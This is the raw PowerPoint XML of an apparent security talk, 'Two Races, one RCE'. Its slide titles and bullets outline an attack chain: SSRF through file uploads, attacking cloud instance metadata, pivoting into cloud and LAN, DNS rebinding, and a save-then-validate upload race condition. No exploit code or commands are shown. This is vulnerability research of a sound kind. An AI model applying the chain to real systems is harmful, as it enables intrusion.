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slides/slide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide28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</p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId12"/>
    <p:sldId id="282" r:id="rId4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3" r:id="rId43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4" d="100"/>
          <a:sy n="124" d="100"/>
        </p:scale>
        <p:origin x="1068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viewProps" Target="viewProps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1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presProps" Target="presProps.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId43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sv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CB4C479-3F87-4604-94A6-B431D2305883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43608BA3-991D-4D47-8EB2-B92B44CE344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15ADB9C1-D250-4D34-B18B-C0EB8337E754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5F11B9D-5AE4-4E7F-9243-BB11B1578FE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BDB3E77-69AE-4C3E-B310-6A27E394DB4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E04E52F-D223-4057-8CA9-8677F90E227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8688900C-995B-4974-8C45-C5185EEC791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431A0EDB-B286-41D0-9DA4-03CB87298353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9690A514-D4D1-4282-9169-2059D724B3D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CADC1010-6CC4-4040-AE04-276F2F8642A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CA6EE953-A4F1-4666-A442-B392744BCA0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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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99C4DD8-8369-4958-B11F-21C98866B4D9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2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a: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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a: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Fourth level</a:t>
            </a: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Fifth level</a:t>
            </a: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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58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60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E23B47D-4B00-4E0D-944B-44DAD543BACA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2000" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Seventh Outline Level</a:t>
            </a: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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64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5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66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97B5B00-1A29-4615-9764-DD407126467C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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a: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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a: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Fourth level</a:t>
            </a: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Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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10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DE18D25-7168-4BD8-B59B-C31FA581AB47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7040" cy="58510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ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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9560" cy="58510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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a: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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a: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Fourth level</a:t>
            </a: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Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13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15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40F2CF4-FB1F-4ED6-961D-C0ED91EC6F29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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a: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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a: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Fourth level</a:t>
            </a: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Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="PlaceHolder 3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20" name="PlaceHolder 5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4D297F9-97C5-4EC9-BC4A-030456416FDE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1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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lang="en-US" sz="20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27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5BB4005-DE16-4C1A-850E-B3A521C3724F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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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</a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2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Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3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800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4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lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a: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</a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2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Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3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800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4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lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="PlaceHolder 4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33" name="PlaceHolder 6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67DAA88-5210-4295-9772-BBD405A65783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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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1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  <a:endParaRPr lang="en-US" sz="24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</a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1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Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4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lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a: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1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  <a:endParaRPr lang="en-US" sz="24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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="743040" lvl="1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Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1600200" lvl="3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600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2057400" lvl="4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lang="en-US" sz="1600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="PlaceHolder 6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44" name="PlaceHolder 8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DCB7948-EEF9-4F5F-8AF2-14D7CD558751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strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1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46" name="PlaceHolder 2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48" name="PlaceHolder 4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E60A8D1-0DBE-4206-877C-6606F372F7D6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52" name="PlaceHolder 3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9F1218D-AD4A-4ECA-9963-6FFB373B6D5D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chemeClr val="dk1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5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chemeClr val="dk1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chemeClr val="dk1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chemeClr val="dk1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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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Relationship Id="rId3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 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="685764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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907200" y="2027520"/>
            <a:ext cx="10377000" cy="1289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5074"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200" b="1" strike="noStrike" spc="364">
                <a:solidFill>
                  <a:srgbClr val="FCFBFC"/>
                </a:solidFill>
                <a:latin typeface="Kanit Medium"/>
              </a:rPr>
              <a:t>Concrete Evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4200" b="0" strike="noStrike" spc="-1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ts val="5074"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200" b="1" strike="noStrike" spc="364">
                <a:solidFill>
                  <a:srgbClr val="FCFBFC"/>
                </a:solidFill>
                <a:latin typeface="Kanit Medium"/>
              </a:rPr>
              <a:t>Two Races, one RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251280" y="221400"/>
            <a:ext cx="11940480" cy="68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704"/>
              </a:lnSpc>
            </a:pP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2704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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 Part 1 Uploads as  SSRF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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060880" y="6362280"/>
            <a:ext cx="202680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0" name="Picture 13" descr="A screenshot of a computer"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="852840" y="1595520"/>
            <a:ext cx="5240160" cy="2562480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Picture 14" descr="A screenshot of a computer"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151400" y="1595520"/>
            <a:ext cx="3629160" cy="2655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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251280" y="221400"/>
            <a:ext cx="11940480" cy="68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704"/>
              </a:lnSpc>
            </a:pP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2704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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– Pivot in the Cloud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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060880" y="6362280"/>
            <a:ext cx="202680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5" name="Picture 3" descr="Attack the Instance Metadata in the CLoud."/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064600" y="1395720"/>
            <a:ext cx="7504560" cy="39132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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251280" y="221400"/>
            <a:ext cx="11940480" cy="68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704"/>
              </a:lnSpc>
            </a:pP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2704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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– Pivot in the LAN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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060880" y="6362280"/>
            <a:ext cx="202680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9" name="Picture 4" descr="A screenshot of a computer"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386280" y="1489320"/>
            <a:ext cx="5923440" cy="3267000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Picture 5" descr="A screenshot of a computer program"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322320" y="1491120"/>
            <a:ext cx="5700960" cy="3263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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251280" y="221400"/>
            <a:ext cx="11940480" cy="68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704"/>
              </a:lnSpc>
            </a:pP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2704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="54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– DNS rebinding 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Box 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060880" y="6362280"/>
            <a:ext cx="202680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4" name="Picture 3" descr="A screenshot of a computer"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="249120" y="1271880"/>
            <a:ext cx="4997160" cy="3032640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Picture 6" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5375520" y="1274040"/>
            <a:ext cx="6820560" cy="30276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7" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5300640" y="0"/>
            <a:ext cx="6884640" cy="6851520"/>
            <a:chOff x="5300640" y="0"/>
            <a:chExt cx="6884640" cy="6851520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5300640" y="0"/>
              <a:ext cx="6884640" cy="6851520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 6884640"/>
                <a:gd name="textAreaRight" fmla="*/ 6885000 w 6884640"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 6851520"/>
                <a:gd name="textAreaBottom" fmla="*/ 6851880 h 6851520"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="9188323" h="9144000">
                  <a:moveTo>
                    <a:pt x="1489202" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="262128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1085850" y="764413"/>
                    <a:pt x="867156" y="1288161"/>
                    <a:pt x="680212" y="1828292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389255" y="2676271"/>
                    <a:pt x="188468" y="3552444"/>
                    <a:pt x="81026" y="4441952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24892" y="4897247"/>
                    <a:pt x="0" y="5351907"/>
                    <a:pt x="35306" y="5809869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77216" y="6345301"/>
                    <a:pt x="140462" y="6877304"/>
                    <a:pt x="247523" y="7403973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365760" y="7985252"/>
                    <a:pt x="526288" y="8552815"/>
                    <a:pt x="738251" y="9104376"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="754888" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825119" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815975" y="9122029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="698754" y="8818626"/>
                    <a:pt x="596392" y="8507730"/>
                    <a:pt x="506603" y="8190230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="428498" y="7913751"/>
                    <a:pt x="370967" y="7631557"/>
                    <a:pt x="304292" y="7351903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302641" y="7337044"/>
                    <a:pt x="301879" y="7322058"/>
                    <a:pt x="301752" y="7307199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301752" y="7307199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="350647" y="7476744"/>
                    <a:pt x="389763" y="7626350"/>
                    <a:pt x="435864" y="7773797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556260" y="8157845"/>
                    <a:pt x="695071" y="8531352"/>
                    <a:pt x="852932" y="8894064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="970026" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188323" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188323" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655318" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527048" y="198247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351407" y="487299"/>
                    <a:pt x="1191895" y="786003"/>
                    <a:pt x="1046480" y="1093216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1039368" y="1111377"/>
                    <a:pt x="1027684" y="1127252"/>
                    <a:pt x="1012444" y="1139317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1012444" y="1139317"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032129" y="1093216"/>
                    <a:pt x="1051052" y="1046734"/>
                    <a:pt x="1070991" y="1000506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152398" y="811657"/>
                    <a:pt x="1238504" y="625602"/>
                    <a:pt x="1329563" y="442341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1566164" y="0"/>
                  </a:ln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39" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270360" y="-63720"/>
            <a:ext cx="5423400" cy="1494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5885"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="42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File Upload Part 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="42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5885"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="42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first race condition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407292" y="1812750"/>
            <a:ext cx="4756417" cy="416216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2404"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>File is downloaded from remote server (SSRF by design)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="217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450"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Low Privileged user is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="3450"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="217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2401"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>file is saved on the system, then validation is done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2401"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="217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614"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>If it fails validation, then it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>deleted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="3614"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="4" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
              <a:ea typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="1188"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2170" spc="4" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="1188"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2170" spc="4" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5F4776"/>
              </a:solidFill>
              <a:latin typeface="Calibri (MS)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="1188"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2170" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Order of operations?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="217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6" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="4562280"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12191760" cy="4562280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12191760" cy="4562280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 12191760"/>
                <a:gd name="textAreaRight" fmla="*/ 12192120 w 12191760"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 4562280"/>
                <a:gd name="textAreaBottom" fmla="*/ 4562640 h 4562280"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="16256000" h="6083300">
                  <a:moveTo>
                    <a:pt x="3472688" y="5624195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3477006" y="5624703"/>
                    <a:pt x="3481197" y="5625211"/>
                    <a:pt x="3485515" y="5625719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3484372" y="5626100"/>
                    <a:pt x="3483102" y="5626227"/>
                    <a:pt x="3481832" y="5626227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479038" y="5626227"/>
                    <a:pt x="3475990" y="5625465"/>
                    <a:pt x="3472688" y="5624195"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9055227" y="5992114"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9053576" y="5993003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9053957" y="5992368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9055354" y="5992241"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4716907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560705" y="4902327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="866521" y="4996815"/>
                    <a:pt x="1174242" y="5085588"/>
                    <a:pt x="1483868" y="5168519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130679" y="5341747"/>
                    <a:pt x="2783713" y="5489702"/>
                    <a:pt x="3442335" y="5612384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3453892" y="5614543"/>
                    <a:pt x="3464052" y="5620893"/>
